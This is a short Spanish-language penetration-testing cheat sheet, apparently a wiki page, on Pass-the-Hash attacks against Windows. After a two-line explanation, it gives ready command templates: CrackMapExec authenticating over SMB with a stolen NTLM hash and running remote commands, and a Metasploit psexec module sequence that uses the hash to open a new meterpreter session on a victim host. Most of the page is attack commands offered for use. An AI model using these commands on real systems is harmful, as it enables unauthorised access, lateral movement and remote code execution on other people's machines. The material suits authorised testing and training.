Pass-The-Hash (Windows)
Pass the Hash es una técnica utilizada para acceder a un sistema protegido sin necesidad de conocer la contraseña en texto plano del usuario. En lugar de esto, el atacante aprovecha los hash de las contraseñas que ya están almacenados y los utiliza para autenticarse.
En este ataque, partimos de haber obtenido el hash NTLM, ya sea con mimikatz, con kiwi, con el comando hashdump de meterpreter o cualquier otra herramienta
Explotación con CrackMapExec (Necesitamos solo el hash NTLM)
crackmapexec smb <IP> -u <user> -H “<NTLM hash>”
Para ejecutar comandos
crackmapexec smb -u -H “” -x “<comando”>
Explotación con Psexec en Metasploit (Necesitamos el LM y NTLM hash)
Módulo a utilizar: exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set LPORT <Puerto libre local> (Ya que recibiremos otra sesión de meterpreter nueva)
set RHOSTS <IP vícitma>
set SMBUser <user>
set SMBPass <hash NTLM>
set target Native\ upload
exploitÚltima actualización